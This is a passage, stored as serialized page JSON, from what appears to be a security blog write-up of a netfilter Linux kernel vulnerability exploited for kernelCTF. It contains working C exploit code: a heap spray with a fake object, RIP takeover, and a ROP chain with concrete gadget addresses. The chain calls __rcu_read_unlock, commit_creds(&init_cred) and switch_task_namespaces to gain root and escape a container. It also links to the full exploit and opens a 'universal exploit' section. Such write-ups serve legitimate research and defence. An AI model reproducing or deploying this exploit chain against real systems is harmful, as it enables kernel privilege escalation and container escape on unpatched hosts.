\"",{"type":25,"tag":216,"props":60286,"children":60287},{"style":6936},[60288],{"type":31,"value":60250},{"type":25,"tag":216,"props":60290,"children":60291},{"style":6964},[60292],{"type":31,"value":60293},"-3",{"type":25,"tag":216,"props":60295,"children":60296},{"style":8205},[60297],{"type":31,"value":60260},{"type":25,"tag":216,"props":60299,"children":60300},{"class":6922,"line":7557},[60301],{"type":25,"tag":216,"props":60302,"children":60303},{"style":8205},[60304],{"type":31,"value":60305},"    DumpHex(fake_obj, 0xe8);\n",{"type":25,"tag":216,"props":60307,"children":60308},{"class":6922,"line":7574},[60309],{"type":25,"tag":216,"props":60310,"children":60311},{"style":8205},[60312],{"type":31,"value":60313},"    uint64_t rop_addr = fake_obj[9]; // udata ptr\n",{"type":25,"tag":216,"props":60315,"children":60316},{"class":6922,"line":7591},[60317,60322,60326,60330,60334,60339,60344,60349,60353,60358,60363,60368,60372],{"type":25,"tag":216,"props":60318,"children":60319},{"style":8205},[60320],{"type":31,"value":60321},"    printf(\"",{"type":25,"tag":216,"props":60323,"children":60324},{"style":6964},[60325],{"type":31,"value":7701},{"type":25,"tag":216,"props":60327,"children":60328},{"style":6953},[60329],{"type":31,"value":8519},{"type":25,"tag":216,"props":60331,"children":60332},{"style":6964},[60333],{"type":31,"value":12614},{"type":25,"tag":216,"props":60335,"children":60336},{"style":7375},[60337],{"type":31,"value":60338},"ROP",{"type":25,"tag":216,"props":60340,"children":60341},{"style":7375},[60342],{"type":31,"value":60343}," addr",{"type":25,"tag":216,"props":60345,"children":60346},{"style":6964},[60347],{"type":31,"value":60348},": 0",{"type":25,"tag":216,"props":60350,"children":60351},{"style":7375},[60352],{"type":31,"value":2541},{"type":25,"tag":216,"props":60354,"children":60355},{"style":6964},[60356],{"type":31,"value":60357},"%",{"type":25,"tag":216,"props":60359,"children":60360},{"style":7375},[60361],{"type":31,"value":60362},"lx",{"type":25,"tag":216,"props":60364,"children":60365},{"style":6964},[60366],{"type":31,"value":60367},"\\",{"type":25,"tag":216,"props":60369,"children":60370},{"style":7375},[60371],{"type":31,"value":2196},{"type":25,"tag":216,"props":60373,"children":60374},{"style":8205},[60375],{"type":31,"value":60376},"\", rop_addr);\n",{"type":25,"tag":216,"props":60378,"children":60379},{"class":6922,"line":7604},[60380],{"type":25,"tag":216,"props":60381,"children":60382},{"emptyLinePlaceholder":16},[60383],{"type":31,"value":7642},{"type":25,"tag":216,"props":60385,"children":60386},{"class":6922,"line":7613},[60387],{"type":25,"tag":216,"props":60388,"children":60389},{"style":8205},[60390],{"type":31,"value":60391},"    // Point to fake ops\n",{"type":25,"tag":216,"props":60393,"children":60394},{"class":6922,"line":7636},[60395],{"type":25,"tag":216,"props":60396,"children":60397},{"style":8205},[60398],{"type":31,"value":60399},"    fake_obj[16] = rop_addr - 0x20; // Point ops to fake ptr table\n",{"type":25,"tag":216,"props":60401,"children":60402},{"class":6922,"line":7645},[60403],{"type":25,"tag":216,"props":60404,"children":60405},{"style":8205},[60406],{"type":31,"value":14275},{"type":25,"tag":216,"props":60408,"children":60409},{"class":6922,"line":7654},[60410],{"type":25,"tag":216,"props":60411,"children":60412},{"style":8205},[60413],{"type":31,"value":60414},"    // Write ROP\n",{"type":25,"tag":216,"props":60416,"children":60417},{"class":6922,"line":7722},[60418,60423,60427,60431,60435,60440,60445],{"type":25,"tag":216,"props":60419,"children":60420},{"style":8205},[60421],{"type":31,"value":60422},"    puts(\"",{"type":25,"tag":216,"props":60424,"children":60425},{"style":6964},[60426],{"type":31,"value":7701},{"type":25,"tag":216,"props":60428,"children":60429},{"style":6953},[60430],{"type":31,"value":8519},{"type":25,"tag":216,"props":60432,"children":60433},{"style":6964},[60434],{"type":31,"value":12614},{"type":25,"tag":216,"props":60436,"children":60437},{"style":7375},[60438],{"type":31,"value":60439},"Write",{"type":25,"tag":216,"props":60441,"children":60442},{"style":7375},[60443],{"type":31,"value":60444}," ROP",{"type":25,"tag":216,"props":60446,"children":60447},{"style":8205},[60448],{"type":31,"value":60260},{"type":25,"tag":216,"props":60450,"children":60451},{"class":6922,"line":7730},[60452],{"type":25,"tag":216,"props":60453,"children":60454},{"style":8205},[60455],{"type":31,"value":60456},"    deludata_spray(nl, 3, 1);\n",{"type":25,"tag":216,"props":60458,"children":60459},{"class":6922,"line":7760},[60460],{"type":25,"tag":216,"props":60461,"children":60462},{"style":8205},[60463],{"type":31,"value":60268},{"type":25,"tag":216,"props":60465,"children":60466},{"class":6922,"line":7768},[60467],{"type":25,"tag":216,"props":60468,"children":60469},{"style":8205},[60470],{"type":31,"value":60471},"    udata_spray(nl, 0xe8, 4, 1, fake_obj);\n",{"type":25,"tag":216,"props":60473,"children":60474},{"class":6922,"line":7800},[60475],{"type":25,"tag":216,"props":60476,"children":60477},{"emptyLinePlaceholder":16},[60478],{"type":31,"value":7642},{"type":25,"tag":216,"props":60480,"children":60481},{"class":6922,"line":7808},[60482],{"type":25,"tag":216,"props":60483,"children":60484},{"style":8205},[60485],{"type":31,"value":60486},"    // Takeover RIP\n",{"type":25,"tag":216,"props":60488,"children":60489},{"class":6922,"line":7868},[60490,60494,60498,60502,60506,60511,60516],{"type":25,"tag":216,"props":60491,"children":60492},{"style":8205},[60493],{"type":31,"value":60422},{"type":25,"tag":216,"props":60495,"children":60496},{"style":6964},[60497],{"type":31,"value":7701},{"type":25,"tag":216,"props":60499,"children":60500},{"style":6953},[60501],{"type":31,"value":8519},{"type":25,"tag":216,"props":60503,"children":60504},{"style":6964},[60505],{"type":31,"value":12614},{"type":25,"tag":216,"props":60507,"children":60508},{"style":7375},[60509],{"type":31,"value":60510},"Takeover",{"type":25,"tag":216,"props":60512,"children":60513},{"style":7375},[60514],{"type":31,"value":60515}," RIP",{"type":25,"tag":216,"props":60517,"children":60518},{"style":8205},[60519],{"type":31,"value":60260},{"type":25,"tag":216,"props":60521,"children":60522},{"class":6922,"line":13001},[60523,60528,60532,60537],{"type":25,"tag":216,"props":60524,"children":60525},{"style":8205},[60526],{"type":31,"value":60527},"    dump_obj(nl, \"",{"type":25,"tag":216,"props":60529,"children":60530},{"style":6936},[60531],{"type":31,"value":60250},{"type":25,"tag":216,"props":60533,"children":60534},{"style":6964},[60535],{"type":31,"value":60536},"-1",{"type":25,"tag":216,"props":60538,"children":60539},{"style":8205},[60540],{"type":31,"value":60260},{"type":25,"tag":216,"props":60542,"children":60543},{"class":6922,"line":13019},[60544],{"type":25,"tag":216,"props":60545,"children":60546},{"style":8205},[60547],{"type":31,"value":14275},{"type":25,"tag":606,"props":60549,"children":60551},{"id":60550},"bypass-context-switch-in-rcu-critical-section",[60552],{"type":31,"value":60553},"Bypass context switch in RCU critical-section",{"type":25,"tag":38,"props":60555,"children":60556},{},[60557,60558,60563],{"type":31,"value":474},{"type":25,"tag":82,"props":60559,"children":60561},{"className":60560},[],[60562],{"type":31,"value":59082},{"type":31,"value":60564}," operations are invoked from an RCU critical-section, which can be a problem for ROPing since we want to switch contexts to userland after executing our payload, which is illegal in RCU critical-sections.",{"type":25,"tag":38,"props":60566,"children":60567},{},[60568,60570,60577,60579,60585,60587,60593],{"type":31,"value":60569},"A workaround has been discussed before by D3v17 in a ",{"type":25,"tag":162,"props":60571,"children":60574},{"href":60572,"rel":60573},"https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md#post-rip",[166],[60575],{"type":31,"value":60576},"previous kernelCTF submission",{"type":31,"value":60578}," that basically consists in using memory write gadgets to overwrite the RCU lock in our ",{"type":25,"tag":82,"props":60580,"children":60582},{"className":60581},[],[60583],{"type":31,"value":60584},"task_struct",{"type":31,"value":60586}," before switching to userland. Although this works, I struggled to find useful gadgets but ended up coming up with an easier solution. There are kernel APIs specifically meant for acquiring/releasing the RCU lock, so we should be able to simply call ",{"type":25,"tag":82,"props":60588,"children":60590},{"className":60589},[],[60591],{"type":31,"value":60592},"__rcu_read_unlock()",{"type":31,"value":60594}," function and exit the RCU critical-section before switching contexts.",{"type":25,"tag":206,"props":60596,"children":60598},{"className":33070,"code":60597,"language":33072,"meta":7,"style":7},"    // ROP stage 1\n    int pos = 3;\n\n    rop[pos++] = kaslr_slide + __RCU_READ_UNLOCK;\n",[60599],{"type":25,"tag":82,"props":60600,"children":60601},{"__ignoreMap":7},[60602,60610,60634,60641],{"type":25,"tag":216,"props":60603,"children":60604},{"class":6922,"line":6923},[60605],{"type":25,"tag":216,"props":60606,"children":60607},{"style":6927},[60608],{"type":31,"value":60609},"    // ROP stage 1\n",{"type":25,"tag":216,"props":60611,"children":60612},{"class":6922,"line":6769},[60613,60617,60622,60626,60630],{"type":25,"tag":216,"props":60614,"children":60615},{"style":6936},[60616],{"type":31,"value":23037},{"type":25,"tag":216,"props":60618,"children":60619},{"style":6964},[60620],{"type":31,"value":60621}," pos ",{"type":25,"tag":216,"props":60623,"children":60624},{"style":6953},[60625],{"type":31,"value":266},{"type":25,"tag":216,"props":60627,"children":60628},{"style":6989},[60629],{"type":31,"value":23059},{"type":25,"tag":216,"props":60631,"children":60632},{"style":6964},[60633],{"type":31,"value":6967},{"type":25,"tag":216,"props":60635,"children":60636},{"class":6922,"line":6778},[60637],{"type":25,"tag":216,"props":60638,"children":60639},{"emptyLinePlaceholder":16},[60640],{"type":31,"value":7642},{"type":25,"tag":216,"props":60642,"children":60643},{"class":6922,"line":7005},[60644,60648,60653,60657,60661,60665,60669,60673],{"type":25,"tag":216,"props":60645,"children":60646},{"style":6947},[60647],{"type":31,"value":60138},{"type":25,"tag":216,"props":60649,"children":60650},{"style":6964},[60651],{"type":31,"value":60652},"[pos",{"type":25,"tag":216,"props":60654,"children":60655},{"style":6953},[60656],{"type":31,"value":55238},{"type":25,"tag":216,"props":60658,"children":60659},{"style":6964},[60660],{"type":31,"value":12614},{"type":25,"tag":216,"props":60662,"children":60663},{"style":6953},[60664],{"type":31,"value":266},{"type":25,"tag":216,"props":60666,"children":60667},{"style":6964},[60668],{"type":31,"value":60159},{"type":25,"tag":216,"props":60670,"children":60671},{"style":6953},[60672],{"type":31,"value":3539},{"type":25,"tag":216,"props":60674,"children":60675},{"style":6964},[60676],{"type":31,"value":60677}," __RCU_READ_UNLOCK;\n",{"type":25,"tag":606,"props":60679,"children":60681},{"id":60680},"rop",[60682],{"type":31,"value":60338},{"type":25,"tag":38,"props":60684,"children":60685},{},[60686],{"type":31,"value":60687},"Most of the ROP chain to escape the container as root is business as usual:",{"type":25,"tag":2039,"props":60689,"children":60690},{},[60691,60702,60713],{"type":25,"tag":2043,"props":60692,"children":60693},{},[60694,60700],{"type":25,"tag":82,"props":60695,"children":60697},{"className":60696},[],[60698],{"type":31,"value":60699},"commit_creds(&init_cred);",{"type":31,"value":60701}," Commit root credentials to our process",{"type":25,"tag":2043,"props":60703,"children":60704},{},[60705,60711],{"type":25,"tag":82,"props":60706,"children":60708},{"className":60707},[],[60709],{"type":31,"value":60710},"task = find_task_by_vpid(1);",{"type":31,"value":60712}," Find the root process of our namespace",{"type":25,"tag":2043,"props":60714,"children":60715},{},[60716,60722],{"type":25,"tag":82,"props":60717,"children":60719},{"className":60718},[],[60720],{"type":31,"value":60721},"switch_task_namespaces(task, &init_nsproxy);",{"type":31,"value":60723}," Move it to the root namespace",{"type":25,"tag":38,"props":60725,"children":60726},{},[60727,60729,60735,60737,60743,60745,60751,60753,60759,60761,60766,60768,60774],{"type":31,"value":60728},"However, I had a hard time finding gadgets to easily move the return value of ",{"type":25,"tag":82,"props":60730,"children":60732},{"className":60731},[],[60733],{"type":31,"value":60734},"find_task_by_vpid(1)",{"type":31,"value":60736}," passed through ",{"type":25,"tag":82,"props":60738,"children":60740},{"className":60739},[],[60741],{"type":31,"value":60742},"rax",{"type":31,"value":60744}," to ",{"type":25,"tag":82,"props":60746,"children":60748},{"className":60747},[],[60749],{"type":31,"value":60750},"rdi",{"type":31,"value":60752},". What I ended up going with was a ",{"type":25,"tag":82,"props":60754,"children":60756},{"className":60755},[],[60757],{"type":31,"value":60758},"push rax; jmp qword ptr [rsi + 0x66]; ret",{"type":31,"value":60760}," gadget, that allowed me to push the ",{"type":25,"tag":82,"props":60762,"children":60764},{"className":60763},[],[60765],{"type":31,"value":60742},{"type":31,"value":60767}," value onto the stack and then jump to a controlled location, where I stored a ",{"type":25,"tag":82,"props":60769,"children":60771},{"className":60770},[],[60772],{"type":31,"value":60773},"pop rdi; ret",{"type":31,"value":60775}," gadget to consume the new stack value and restore normal ROP execution. This very minor detour in the ROP flow looks like this:",{"type":25,"tag":2039,"props":60777,"children":60778},{},[60779,60784,60797],{"type":25,"tag":2043,"props":60780,"children":60781},{},[60782],{"type":31,"value":60783},"We push the value onto the stack (stack pointer regresses)",{"type":25,"tag":2043,"props":60785,"children":60786},{},[60787,60789,60795],{"type":31,"value":60788},"We jump to our \"trampoline\" gadget (",{"type":25,"tag":82,"props":60790,"children":60792},{"className":60791},[],[60793],{"type":31,"value":60794},"pop rdi; ret;",{"type":31,"value":60796}," location)",{"type":25,"tag":2043,"props":60798,"children":60799},{},[60800,60805],{"type":25,"tag":82,"props":60801,"children":60803},{"className":60802},[],[60804],{"type":31,"value":60773},{"type":31,"value":60806}," consumes the value from the stack (progressing the stack pointer back to where it should be), and then we bounce back to the next gadget",{"type":25,"tag":206,"props":60808,"children":60810},{"className":33070,"code":60809,"language":33072,"meta":7,"style":7},"[...]\n    // commit_creds(&init_cred);\n    rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n    rop[pos++] = kaslr_slide + INIT_CRED;\n    rop[pos++] = kaslr_slide + COMMIT_CREDS;\n\n    // task = find_task_by_vpid(1);\n    rop[pos++] = kaslr_slide + 0xffffffff8112c7c0; // pop rdi; ret;\n    rop[pos++] = 1;\n    rop[pos++] = kaslr_slide + FIND_TASK_BY_VPID;\n    rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n    rop[pos++] = obj_ptr + 0xe0 - 0x66;            // rax -> rdi and resume rop\n    rop[pos++] = kaslr_slide + 0xffffffff81caed31; // push rax; jmp qword ptr [rsi + 0x66];\n\n    // switch_task_namespaces(task, &init_nsproxy);\n    rop[pos++] = kaslr_slide + 0xffffffff8102e2a6; // pop rsi; ret;\n    rop[pos++] = kaslr_slide + INIT_NSPROXY;\n    rop[pos++] = kaslr_slide + SWITCH_TASK_NAMESPACES;\n[...]\n",[60811],{"type":25,"tag":82,"props":60812,"children":60813},{"__ignoreMap":7},[60814,60821,60838,60883,60919,60955,60962,60970,61013,61044,61080,61125,61180,61225,61232,61240,61283,61319,61355],{"type":25,"tag":216,"props":60815,"children":60816},{"class":6922,"line":6923},[60817],{"type":25,"tag":216,"props":60818,"children":60819},{"style":6964},[60820],{"type":31,"value":14275},{"type":25,"tag":216,"props":60822,"children":60823},{"class":6922,"line":6769},[60824,60829,60834],{"type":25,"tag":216,"props":60825,"children":60826},{"style":6964},[60827],{"type":31,"value":60828},"    // commit_creds(&",{"type":25,"tag":216,"props":60830,"children":60831},{"style":6947},[60832],{"type":31,"value":60833},"init_cred",{"type":25,"tag":216,"props":60835,"children":60836},{"style":6964},[60837],{"type":31,"value":7797},{"type":25,"tag":216,"props":60839,"children":60840},{"class":6922,"line":6778},[60841,60845,60849,60853,60857,60861,60865,60869,60874,60878],{"type":25,"tag":216,"props":60842,"children":60843},{"style":6947},[60844],{"type":31,"value":60138},{"type":25,"tag":216,"props":60846,"children":60847},{"style":6964},[60848],{"type":31,"value":60652},{"type":25,"tag":216,"props":60850,"children":60851},{"style":6953},[60852],{"type":31,"value":55238},{"type":25,"tag":216,"props":60854,"children":60855},{"style":6964},[60856],{"type":31,"value":12614},{"type":25,"tag":216,"props":60858,"children":60859},{"style":6953},[60860],{"type":31,"value":266},{"type":25,"tag":216,"props":60862,"children":60863},{"style":6964},[60864],{"type":31,"value":60159},{"type":25,"tag":216,"props":60866,"children":60867},{"style":6953},[60868],{"type":31,"value":3539},{"type":25,"tag":216,"props":60870,"children":60871},{"style":6989},[60872],{"type":31,"value":60873}," 0xffffffff8112c7c0",{"type":25,"tag":216,"props":60875,"children":60876},{"style":6964},[60877],{"type":31,"value":53043},{"type":25,"tag":216,"props":60879,"children":60880},{"style":6927},[60881],{"type":31,"value":60882}," // pop rdi; ret;\n",{"type":25,"tag":216,"props":60884,"children":60885},{"class":6922,"line":7005},[60886,60890,60894,60898,60902,60906,60910,60914],{"type":25,"tag":216,"props":60887,"children":60888},{"style":6947},[60889],{"type":31,"value":60138},{"type":25,"tag":216,"props":60891,"children":60892},{"style":6964},[60893],{"type":31,"value":60652},{"type":25,"tag":216,"props":60895,"children":60896},{"style":6953},[60897],{"type":31,"value":55238},{"type":25,"tag":216,"props":60899,"children":60900},{"style":6964},[60901],{"type":31,"value":12614},{"type":25,"tag":216,"props":60903,"children":60904},{"style":6953},[60905],{"type":31,"value":266},{"type":25,"tag":216,"props":60907,"children":60908},{"style":6964},[60909],{"type":31,"value":60159},{"type":25,"tag":216,"props":60911,"children":60912},{"style":6953},[60913],{"type":31,"value":3539},{"type":25,"tag":216,"props":60915,"children":60916},{"style":6964},[60917],{"type":31,"value":60918}," INIT_CRED;\n",{"type":25,"tag":216,"props":60920,"children":60921},{"class":6922,"line":7110},[60922,60926,60930,60934,60938,60942,60946,60950],{"type":25,"tag":216,"props":60923,"children":60924},{"style":6947},[60925],{"type":31,"value":60138},{"type":25,"tag":216,"props":60927,"children":60928},{"style":6964},[60929],{"type":31,"value":60652},{"type":25,"tag":216,"props":60931,"children":60932},{"style":6953},[60933],{"type":31,"value":55238},{"type":25,"tag":216,"props":60935,"children":60936},{"style":6964},[60937],{"type":31,"value":12614},{"type":25,"tag":216,"props":60939,"children":60940},{"style":6953},[60941],{"type":31,"value":266},{"type":25,"tag":216,"props":60943,"children":60944},{"style":6964},[60945],{"type":31,"value":60159},{"type":25,"tag":216,"props":60947,"children":60948},{"style":6953},[60949],{"type":31,"value":3539},{"type":25,"tag":216,"props":60951,"children":60952},{"style":6964},[60953],{"type":31,"value":60954}," COMMIT_CREDS;\n",{"type":25,"tag":216,"props":60956,"children":60957},{"class":6922,"line":7216},[60958],{"type":25,"tag":216,"props":60959,"children":60960},{"emptyLinePlaceholder":16},[60961],{"type":31,"value":7642},{"type":25,"tag":216,"props":60963,"children":60964},{"class":6922,"line":7244},[60965],{"type":25,"tag":216,"props":60966,"children":60967},{"style":6927},[60968],{"type":31,"value":60969},"    // task = find_task_by_vpid(1);\n",{"type":25,"tag":216,"props":60971,"children":60972},{"class":6922,"line":7257},[60973,60977,60981,60985,60989,60993,60997,61001,61005,61009],{"type":25,"tag":216,"props":60974,"children":60975},{"style":6947},[60976],{"type":31,"value":60138},{"type":25,"tag":216,"props":60978,"children":60979},{"style":6964},[60980],{"type":31,"value":60652},{"type":25,"tag":216,"props":60982,"children":60983},{"style":6953},[60984],{"type":31,"value":55238},{"type":25,"tag":216,"props":60986,"children":60987},{"style":6964},[60988],{"type":31,"value":12614},{"type":25,"tag":216,"props":60990,"children":60991},{"style":6953},[60992],{"type":31,"value":266},{"type":25,"tag":216,"props":60994,"children":60995},{"style":6964},[60996],{"type":31,"value":60159},{"type":25,"tag":216,"props":60998,"children":60999},{"style":6953},[61000],{"type":31,"value":3539},{"type":25,"tag":216,"props":61002,"children":61003},{"style":6989},[61004],{"type":31,"value":60873},{"type":25,"tag":216,"props":61006,"children":61007},{"style":6964},[61008],{"type":31,"value":53043},{"type":25,"tag":216,"props":61010,"children":61011},{"style":6927},[61012],{"type":31,"value":60882},{"type":25,"tag":216,"props":61014,"children":61015},{"class":6922,"line":7275},[61016,61020,61024,61028,61032,61036,61040],{"type":25,"tag":216,"props":61017,"children":61018},{"style":6947},[61019],{"type":31,"value":60138},{"type":25,"tag":216,"props":61021,"children":61022},{"style":6964},[61023],{"type":31,"value":60652},{"type":25,"tag":216,"props":61025,"children":61026},{"style":6953},[61027],{"type":31,"value":55238},{"type":25,"tag":216,"props":61029,"children":61030},{"style":6964},[61031],{"type":31,"value":12614},{"type":25,"tag":216,"props":61033,"children":61034},{"style":6953},[61035],{"type":31,"value":266},{"type":25,"tag":216,"props":61037,"children":61038},{"style":6989},[61039],{"type":31,"value":8471},{"type":25,"tag":216,"props":61041,"children":61042},{"style":6964},[61043],{"type":31,"value":6967},{"type":25,"tag":216,"props":61045,"children":61046},{"class":6922,"line":7296},[61047,61051,61055,61059,61063,61067,61071,61075],{"type":25,"tag":216,"props":61048,"children":61049},{"style":6947},[61050],{"type":31,"value":60138},{"type":25,"tag":216,"props":61052,"children":61053},{"style":6964},[61054],{"type":31,"value":60652},{"type":25,"tag":216,"props":61056,"children":61057},{"style":6953},[61058],{"type":31,"value":55238},{"type":25,"tag":216,"props":61060,"children":61061},{"style":6964},[61062],{"type":31,"value":12614},{"type":25,"tag":216,"props":61064,"children":61065},{"style":6953},[61066],{"type":31,"value":266},{"type":25,"tag":216,"props":61068,"children":61069},{"style":6964},[61070],{"type":31,"value":60159},{"type":25,"tag":216,"props":61072,"children":61073},{"style":6953},[61074],{"type":31,"value":3539},{"type":25,"tag":216,"props":61076,"children":61077},{"style":6964},[61078],{"type":31,"value":61079}," FIND_TASK_BY_VPID;\n",{"type":25,"tag":216,"props":61081,"children":61082},{"class":6922,"line":7305},[61083,61087,61091,61095,61099,61103,61107,61111,61116,61120],{"type":25,"tag":216,"props":61084,"children":61085},{"style":6947},[61086],{"type":31,"value":60138},{"type":25,"tag":216,"props":61088,"children":61089},{"style":6964},[61090],{"type":31,"value":60652},{"type":25,"tag":216,"props":61092,"children":61093},{"style":6953},[61094],{"type":31,"value":55238},{"type":25,"tag":216,"props":61096,"children":61097},{"style":6964},[61098],{"type":31,"value":12614},{"type":25,"tag":216,"props":61100,"children":61101},{"style":6953},[61102],{"type":31,"value":266},{"type":25,"tag":216,"props":61104,"children":61105},{"style":6964},[61106],{"type":31,"value":60159},{"type":25,"tag":216,"props":61108,"children":61109},{"style":6953},[61110],{"type":31,"value":3539},{"type":25,"tag":216,"props":61112,"children":61113},{"style":6989},[61114],{"type":31,"value":61115}," 0xffffffff8102e2a6",{"type":25,"tag":216,"props":61117,"children":61118},{"style":6964},[61119],{"type":31,"value":53043},{"type":25,"tag":216,"props":61121,"children":61122},{"style":6927},[61123],{"type":31,"value":61124}," // pop rsi; ret;\n",{"type":25,"tag":216,"props":61126,"children":61127},{"class":6922,"line":7557},[61128,61132,61136,61140,61144,61148,61153,61157,61162,61166,61171,61175],{"type":25,"tag":216,"props":61129,"children":61130},{"style":6947},[61131],{"type":31,"value":60138},{"type":25,"tag":216,"props":61133,"children":61134},{"style":6964},[61135],{"type":31,"value":60652},{"type":25,"tag":216,"props":61137,"children":61138},{"style":6953},[61139],{"type":31,"value":55238},{"type":25,"tag":216,"props":61141,"children":61142},{"style":6964},[61143],{"type":31,"value":12614},{"type":25,"tag":216,"props":61145,"children":61146},{"style":6953},[61147],{"type":31,"value":266},{"type":25,"tag":216,"props":61149,"children":61150},{"style":6964},[61151],{"type":31,"value":61152}," obj_ptr ",{"type":25,"tag":216,"props":61154,"children":61155},{"style":6953},[61156],{"type":31,"value":3539},{"type":25,"tag":216,"props":61158,"children":61159},{"style":6989},[61160],{"type":31,"value":61161}," 0xe0",{"type":25,"tag":216,"props":61163,"children":61164},{"style":6953},[61165],{"type":31,"value":55224},{"type":25,"tag":216,"props":61167,"children":61168},{"style":6989},[61169],{"type":31,"value":61170}," 0x66",{"type":25,"tag":216,"props":61172,"children":61173},{"style":6964},[61174],{"type":31,"value":53043},{"type":25,"tag":216,"props":61176,"children":61177},{"style":6927},[61178],{"type":31,"value":61179},"            // rax -> rdi and resume rop\n",{"type":25,"tag":216,"props":61181,"children":61182},{"class":6922,"line":7574},[61183,61187,61191,61195,61199,61203,61207,61211,61216,61220],{"type":25,"tag":216,"props":61184,"children":61185},{"style":6947},[61186],{"type":31,"value":60138},{"type":25,"tag":216,"props":61188,"children":61189},{"style":6964},[61190],{"type":31,"value":60652},{"type":25,"tag":216,"props":61192,"children":61193},{"style":6953},[61194],{"type":31,"value":55238},{"type":25,"tag":216,"props":61196,"children":61197},{"style":6964},[61198],{"type":31,"value":12614},{"type":25,"tag":216,"props":61200,"children":61201},{"style":6953},[61202],{"type":31,"value":266},{"type":25,"tag":216,"props":61204,"children":61205},{"style":6964},[61206],{"type":31,"value":60159},{"type":25,"tag":216,"props":61208,"children":61209},{"style":6953},[61210],{"type":31,"value":3539},{"type":25,"tag":216,"props":61212,"children":61213},{"style":6989},[61214],{"type":31,"value":61215}," 0xffffffff81caed31",{"type":25,"tag":216,"props":61217,"children":61218},{"style":6964},[61219],{"type":31,"value":53043},{"type":25,"tag":216,"props":61221,"children":61222},{"style":6927},[61223],{"type":31,"value":61224}," // push rax; jmp qword ptr [rsi + 0x66];\n",{"type":25,"tag":216,"props":61226,"children":61227},{"class":6922,"line":7591},[61228],{"type":25,"tag":216,"props":61229,"children":61230},{"emptyLinePlaceholder":16},[61231],{"type":31,"value":7642},{"type":25,"tag":216,"props":61233,"children":61234},{"class":6922,"line":7604},[61235],{"type":25,"tag":216,"props":61236,"children":61237},{"style":6927},[61238],{"type":31,"value":61239},"    // switch_task_namespaces(task, &init_nsproxy);\n",{"type":25,"tag":216,"props":61241,"children":61242},{"class":6922,"line":7613},[61243,61247,61251,61255,61259,61263,61267,61271,61275,61279],{"type":25,"tag":216,"props":61244,"children":61245},{"style":6947},[61246],{"type":31,"value":60138},{"type":25,"tag":216,"props":61248,"children":61249},{"style":6964},[61250],{"type":31,"value":60652},{"type":25,"tag":216,"props":61252,"children":61253},{"style":6953},[61254],{"type":31,"value":55238},{"type":25,"tag":216,"props":61256,"children":61257},{"style":6964},[61258],{"type":31,"value":12614},{"type":25,"tag":216,"props":61260,"children":61261},{"style":6953},[61262],{"type":31,"value":266},{"type":25,"tag":216,"props":61264,"children":61265},{"style":6964},[61266],{"type":31,"value":60159},{"type":25,"tag":216,"props":61268,"children":61269},{"style":6953},[61270],{"type":31,"value":3539},{"type":25,"tag":216,"props":61272,"children":61273},{"style":6989},[61274],{"type":31,"value":61115},{"type":25,"tag":216,"props":61276,"children":61277},{"style":6964},[61278],{"type":31,"value":53043},{"type":25,"tag":216,"props":61280,"children":61281},{"style":6927},[61282],{"type":31,"value":61124},{"type":25,"tag":216,"props":61284,"children":61285},{"class":6922,"line":7636},[61286,61290,61294,61298,61302,61306,61310,61314],{"type":25,"tag":216,"props":61287,"children":61288},{"style":6947},[61289],{"type":31,"value":60138},{"type":25,"tag":216,"props":61291,"children":61292},{"style":6964},[61293],{"type":31,"value":60652},{"type":25,"tag":216,"props":61295,"children":61296},{"style":6953},[61297],{"type":31,"value":55238},{"type":25,"tag":216,"props":61299,"children":61300},{"style":6964},[61301],{"type":31,"value":12614},{"type":25,"tag":216,"props":61303,"children":61304},{"style":6953},[61305],{"type":31,"value":266},{"type":25,"tag":216,"props":61307,"children":61308},{"style":6964},[61309],{"type":31,"value":60159},{"type":25,"tag":216,"props":61311,"children":61312},{"style":6953},[61313],{"type":31,"value":3539},{"type":25,"tag":216,"props":61315,"children":61316},{"style":6964},[61317],{"type":31,"value":61318}," INIT_NSPROXY;\n",{"type":25,"tag":216,"props":61320,"children":61321},{"class":6922,"line":7645},[61322,61326,61330,61334,61338,61342,61346,61350],{"type":25,"tag":216,"props":61323,"children":61324},{"style":6947},[61325],{"type":31,"value":60138},{"type":25,"tag":216,"props":61327,"children":61328},{"style":6964},[61329],{"type":31,"value":60652},{"type":25,"tag":216,"props":61331,"children":61332},{"style":6953},[61333],{"type":31,"value":55238},{"type":25,"tag":216,"props":61335,"children":61336},{"style":6964},[61337],{"type":31,"value":12614},{"type":25,"tag":216,"props":61339,"children":61340},{"style":6953},[61341],{"type":31,"value":266},{"type":25,"tag":216,"props":61343,"children":61344},{"style":6964},[61345],{"type":31,"value":60159},{"type":25,"tag":216,"props":61347,"children":61348},{"style":6953},[61349],{"type":31,"value":3539},{"type":25,"tag":216,"props":61351,"children":61352},{"style":6964},[61353],{"type":31,"value":61354}," SWITCH_TASK_NAMESPACES;\n",{"type":25,"tag":216,"props":61356,"children":61357},{"class":6922,"line":7654},[61358],{"type":25,"tag":216,"props":61359,"children":61360},{"style":6964},[61361],{"type":31,"value":14275},{"type":25,"tag":606,"props":61363,"children":61365},{"id":61364},"grabbing-the-kernelctf-flag",[61366],{"type":31,"value":61367},"Grabbing the kernelCTF flag",{"type":25,"tag":38,"props":61369,"children":61370},{},[61371,61375,61377,61384],{"type":25,"tag":6467,"props":61372,"children":61374},{"alt":54547,"src":61373},"/posts/netfilter-universal-root-1-day/flag.png",[],{"type":31,"value":61376},"\nYou can find the kernelCTF exploit in our ",{"type":25,"tag":162,"props":61378,"children":61381},{"href":61379,"rel":61380},"https://github.com/otter-sec/OtterRoot/blob/master/kernelctf/exploit.c",[166],[61382],{"type":31,"value":61383},"GitHub",{"type":31,"value":179},{"type":25,"tag":26,"props":61386,"children":61388},{"id":61387},"universal-exploit",[61389],{"type":31,"value":61390},"Universal exploit",{"type":25,"tag":38,"props":61392,"children":61393},{},[61394],{"type":31,"value":61395},"After exploiting KernelCTF, I decided to use this vulnerability to craft a universal exploit (one that works stably regardless of the target without needing to be modified). I took a different approach to avoid some compatibility and reliability pitfalls, the biggest ones being ROP and anything else that relies on kernel data offsets because those change from build to build. It's not uncommon to compile a list of gadgets for the different builds but it makes more sense just to avoid the trouble entirely.",{"type":25,"tag":606,"props":61397,"children":61399},{"id":61398},"pivot-capability-using-msg_msg-mlistnext-pointer",[61400],{"type":31,"value":61401},"Pivot capability using msg_msg->mlist.next 